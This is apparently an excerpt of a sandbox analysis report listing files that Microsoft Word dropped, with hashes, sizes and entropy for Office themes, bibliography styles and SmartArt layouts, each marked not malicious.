                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1750795
                                        Entropy (8bit):7.892395931401988
                                        Encrypted:false
                                        SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                        MD5:529795E0B55926752462CBF32C14E738
                                        SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                        SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                        SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.528155916440219
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                        MD5:AA7B919B21FD42C457948DE1E2988CB3
                                        SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                        SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                        SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2357051
                                        Entropy (8bit):7.929430745829162
                                        Encrypted:false
                                        SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                        MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                        SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                        SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                        SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):276
                                        Entropy (8bit):3.516423078177173
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                        MD5:5402138088A9CF0993C08A0CA81287B8
                                        SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                        SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                        SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2218943
                                        Entropy (8bit):7.942378408801199
                                        Encrypted:false
                                        SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                        MD5:EE33FDA08FBF10EF6450B875717F8887
                                        SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                        SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                        SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.544065206514744
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                        MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                        SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                        SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                        SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):2924237
                                        Entropy (8bit):7.970803022812704
                                        Encrypted:false
                                        SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                        MD5:5AF1581E9E055B6E323129E4B07B1A45
                                        SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                        SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                        SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.5434534344080606
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                        MD5:C9812793A4E94320C49C7CA054EE6AA4
                                        SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                        SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                        SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3078052
                                        Entropy (8bit):7.954129852655753
                                        Encrypted:false
                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.5303110391598502
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                        MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                        SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                        SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                        SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                        Malicious:false
                                        Preview:[File] | OriginalName: Mesh.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:modified
                                        Size (bytes):3611324
                                        Entropy (8bit):7.965784120725206
                                        Encrypted:false
                                        SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                        MD5:FB88BFB743EEA98506536FC44B053BD0
                                        SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                        SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):288
                                        Entropy (8bit):3.5359188337181853
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                        MD5:0FEA64606C519B78B7A52639FEA11492
                                        SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                        SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                        SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                        Malicious:false
                                        Preview:[File] | OriginalName: Vapor_Trail.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274
                                        Entropy (8bit):3.4699940532942914
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                        MD5:55BA5B2974A072B131249FD9FD42EB91
                                        SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                        SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                        SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                        Malicious:false
                                        Preview:[File] | OriginalName: Insight design set.dotx | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {WD Document Parts}
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):3465076
                                        Entropy (8bit):7.898517227646252
                                        Encrypted:false
                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):28911
                                        Entropy (8bit):7.7784119983764715
                                        Encrypted:false
                                        SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                        MD5:6D787B1E223DB6B91B69238062CCA872
                                        SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                        SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                        SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31835
                                        Entropy (8bit):7.81952379746457
                                        Encrypted:false
                                        SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                        MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                        SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                        SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                        SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):30957
                                        Entropy (8bit):7.808231503692675
                                        Encrypted:false
                                        SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                        MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                        SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                        SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                        SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20457
                                        Entropy (8bit):7.612540359660869
                                        Encrypted:false
                                        SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                        MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                        SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                        SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                        SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20235
                                        Entropy (8bit):7.61176626859621
                                        Encrypted:false
                                        SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                        MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                        SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                        SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                        SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):25314
                                        Entropy (8bit):7.729848360340861
                                        Encrypted:false
                                        SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                        MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                        SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                        SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                        SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):32833
                                        Entropy (8bit):7.825460303519308
                                        Encrypted:false
                                        SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                        MD5:205AF51604EF96EF1E8E60212541F742
                                        SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                        SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                        SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21357
                                        Entropy (8bit):7.641082043198371
                                        Encrypted:false
                                        SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                        MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                        SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                        SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                        SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22149
                                        Entropy (8bit):7.659898883631361
                                        Encrypted:false
                                        SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                        MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                        SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                        SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                        SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):23597
                                        Entropy (8bit):7.692965575678876
                                        Encrypted:false
                                        SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                        MD5:7C645EC505982FE529D0E5035B378FFC
                                        SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                        SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                        SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):20554
                                        Entropy (8bit):7.612044504501488
                                        Encrypted:false
                                        SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                        MD5:486CBCB223B873132FFAF4B8AD0AD044
                                        SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                        SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                        SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31562
                                        Entropy (8bit):7.81640835713744
                                        Encrypted:false
                                        SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                        MD5:1D6F8E73A0662A48D332090A4C8C898F
                                        SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                        SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                        SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):19893
                                        Entropy (8bit):7.592090622603185
                                        Encrypted:false
                                        SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                        MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                        SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                        SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                        SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31008
                                        Entropy (8bit):7.806058951525675
                                        Encrypted:false
                                        SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                        MD5:E033CCBC7BA787A2F824CE0952E57D44
                                        SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                        SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                        SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31482
